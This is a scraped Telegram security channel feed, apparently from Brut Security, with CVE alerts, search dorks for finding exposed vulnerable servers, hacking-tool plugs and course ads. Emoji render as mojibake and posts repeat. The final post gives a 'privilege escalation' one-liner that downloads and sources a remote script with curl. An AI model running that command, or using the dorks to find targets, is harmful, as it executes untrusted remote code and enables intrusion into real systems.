π¨ 0day Hunters, Pay Attention! π¨
CVE-2025-29927 β Next.js Middleware Auth Bypass [EXPLOIT]
Ever wondered what happens when middleware security checks fail silently? This vuln lets you slip past authentication like a ghost.
π₯ Reproduce it with Vulhub. Exploit it with Nuclei.
Itβs waiting in our Discord.
π [Exploit Download]
CVE-2025-29927 β Next.js Middleware Auth Bypass [EXPLOIT]
Ever wondered what happens when middleware security checks fail silently? This vuln lets you slip past authentication like a ghost.
π₯ Reproduce it with Vulhub. Exploit it with Nuclei.
Itβs waiting in our Discord.
π [Exploit Download]
π₯13π3
Who wants a Spotify Premium 4-month coupon? π§π₯
Drop your favorite hacking playlist, and the best one wins the coupon! π₯πΆ
Drop your favorite hacking playlist, and the best one wins the coupon! π₯πΆ
β€18π5
π ExplainShell β Decode Shell Commands
Found a complex command in a PoC or exploit? Paste it into ExplainShell and see a breakdown of each argument.
π Great for analyzing payloads, understanding Linux commands, and improving your skills.
Essential for Bug Bounty & Pentesting.
Found a complex command in a PoC or exploit? Paste it into ExplainShell and see a breakdown of each argument.
π Great for analyzing payloads, understanding Linux commands, and improving your skills.
Essential for Bug Bounty & Pentesting.
π₯21π5β€2
Dalfox v2.10.0 released! It uses way less CPU while XSS scanning even faster than before.
github.com/hahwul/dalfox
#DAST #Security #BugBounty
github.com/hahwul/dalfox
#DAST #Security #BugBounty
πΏ27π10
Unknown vulnerability in CrushFTP, no ratingβοΈ
The vulnerability allows attackers to gain unauthenticated access if any HTTP(S) port is exposed in the configuration.
Search at Netlas.io:
π Link: https://nt.ls/tI4nF
π Dork: http.headers.server:"CrushFTP"
Read more: https://www.rapid7.com/blog/post/2025/03/25/etr-notable-vulnerabilities-in-next-js-cve-2025-29927/
The vulnerability allows attackers to gain unauthenticated access if any HTTP(S) port is exposed in the configuration.
Search at Netlas.io:
π Link: https://nt.ls/tI4nF
π Dork: http.headers.server:"CrushFTP"
Read more: https://www.rapid7.com/blog/post/2025/03/25/etr-notable-vulnerabilities-in-next-js-cve-2025-29927/
π4
Best Fast Google Dork Scanner
https://github.com/IvanGlinkin/Fast-Google-Dorks-Scan
https://github.com/IvanGlinkin/Fast-Google-Dorks-Scan
GitHub
GitHub - IvanGlinkin/Fast-Google-Dorks-Scan: The OSINT project, the main idea of which is to collect all the possible Google dorksβ¦
The OSINT project, the main idea of which is to collect all the possible Google dorks search combinations and to find the information about the specific web-site: common admin panels, the widesprea...
β€7
CVE-2025-30232: Use-after-free in Exim, "medium" ratingβοΈ
A vulnerability in some versions of Exim potentially allows an attacker to perform Privilege Escalation, if he has command line access.
Search at Netlas.io:
π Link: https://nt.ls/mtDNc
π Dork: smtp.banner:"Exim 4.96" OR smtp.banner:"Exim 4.97" OR smtp.banner:"Exim 4.98" OR smtp.banner:"Exim 4.98.1"
Vendor's advisory: https://exim.org/static/doc/security/CVE-2025-30232.txt
A vulnerability in some versions of Exim potentially allows an attacker to perform Privilege Escalation, if he has command line access.
Search at Netlas.io:
π Link: https://nt.ls/mtDNc
π Dork: smtp.banner:"Exim 4.96" OR smtp.banner:"Exim 4.97" OR smtp.banner:"Exim 4.98" OR smtp.banner:"Exim 4.98.1"
Vendor's advisory: https://exim.org/static/doc/security/CVE-2025-30232.txt
β€8π1
βΊοΈYour support keeps me motivated to share more valuable content! If you found this helpful, drop a like & send stars β to help me keep going.
π¬ For queries, message me on Telegram: @wtf_brut
π For course enrollment, reach out on WhatsApp: wa.link/brutsecurity
π¬ For queries, message me on Telegram: @wtf_brut
π For course enrollment, reach out on WhatsApp: wa.link/brutsecurity
WhatsApp.com
Brut Security
Business Account
3β€13π8π³3π₯2
CVE-2025-1974: Improper Isolation or Compartmentalization in Kubernetes Ingress Controller, 9.8 rating π₯
In some cases, an unauthenticated attacker may be able to execute remote code in the context of the ingress-nginx controller.
Search at Netlas.io:
π Link: https://nt.ls/G6SC7
π Dork: certificate.issuer_dn:"Kubernetes Ingress Controller"
Vendor's advisory: https://github.com/kubernetes/kubernetes/issues/131009
In some cases, an unauthenticated attacker may be able to execute remote code in the context of the ingress-nginx controller.
Search at Netlas.io:
π Link: https://nt.ls/G6SC7
π Dork: certificate.issuer_dn:"Kubernetes Ingress Controller"
Vendor's advisory: https://github.com/kubernetes/kubernetes/issues/131009
π10π€2β€1
π Ultimate Secret Scanner Regex Collection π
30+ regex patterns to detect leaked credentials:
β API keys (Google, AWS, Stripe)
β Auth tokens (OAuth, JWT)
β Private keys (RSA, PGP)
β Emails, URLs, UUIDs
https://github.com/Lu3ky13/Search-for-all-leaked-keys-secrets-using-one-regex-/tree/main
#bugbounty #bugbountytip
30+ regex patterns to detect leaked credentials:
β API keys (Google, AWS, Stripe)
β Auth tokens (OAuth, JWT)
β Private keys (RSA, PGP)
β Emails, URLs, UUIDs
https://github.com/Lu3ky13/Search-for-all-leaked-keys-secrets-using-one-regex-/tree/main
#bugbounty #bugbountytip
π14πΏ12β€2
Please open Telegram to view this post
VIEW IN TELEGRAM
Brilliant Directories
Security Bounty
Learn about Security Bounty - CLICK TO VIEW MORE Β»
π14β€5π€£1
This media is not supported in your browser
VIEW IN TELEGRAM
Google Dorks that can be used for penetration testing, security research, and information gathering.
https://github.com/yogsec/Pen-Testing-Google-Dorks
β€11π₯5π3
π₯ Web Pentesting & Bug Bounty Batch β Starting April!
Master Web Penetration Testing with a Bug Bounty Approach in our new batch starting this April! Learn real-world attack scenarios, exploitation techniques, and defense strategies.
β Weekday & Weekend Batches β Evening Slots (IST)
β Hands-on Labs & Live Automations
β Bug Bounty Methodologies & Practical Hunting
β Community Support & Private POC Access
π© Limited slots! Enroll now and take your hacking skills to the next level.
π± DM https://wa.link/brutsecurity for details! (https://wa.me/+918945971332)
Master Web Penetration Testing with a Bug Bounty Approach in our new batch starting this April! Learn real-world attack scenarios, exploitation techniques, and defense strategies.
β Weekday & Weekend Batches β Evening Slots (IST)
β Hands-on Labs & Live Automations
β Bug Bounty Methodologies & Practical Hunting
β Community Support & Private POC Access
π© Limited slots! Enroll now and take your hacking skills to the next level.
π± DM https://wa.link/brutsecurity for details! (https://wa.me/+918945971332)
β€9π3π₯3
On this special occasion, we extend our warmest wishes to all who celebrate Eid. May this day bring you joy, peace, and prosperity.
At Brut Security, we value diversity and unity, and we appreciate each and every member of our community. Whether youβre celebrating or simply sharing in the happiness of others, we hope today is filled with kindness and togetherness.
Stay curious, stay secure, and keep learning!
Please open Telegram to view this post
VIEW IN TELEGRAM
β€57π5π³2π€£2
CVE-2025-2294: Path Traversal in Kubio WordPress plugin, 9.8 rating π₯
A vulnerability found in a popular plugin allows unauthenticated attackers to execute any code in PHP files on the server.
Search at Netlas.io:
π Link: https://nt.ls/iOqr6
π Dork: http.body:"plugins/kubio"
Read more: https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/kubio/kubio-ai-page-builder-251-unauthenticated-local-file-inclusion
A vulnerability found in a popular plugin allows unauthenticated attackers to execute any code in PHP files on the server.
Search at Netlas.io:
π Link: https://nt.ls/iOqr6
π Dork: http.body:"plugins/kubio"
Read more: https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/kubio/kubio-ai-page-builder-251-unauthenticated-local-file-inclusion
π6π₯3
π₯CVE-20250401 - 7350pipe - Linux Privilege Escalation (all versions). Exploit (1-liner):
β. <(curl -SsfL https://thc.org/7350pipe)β
π€£29πΏ14π2β€1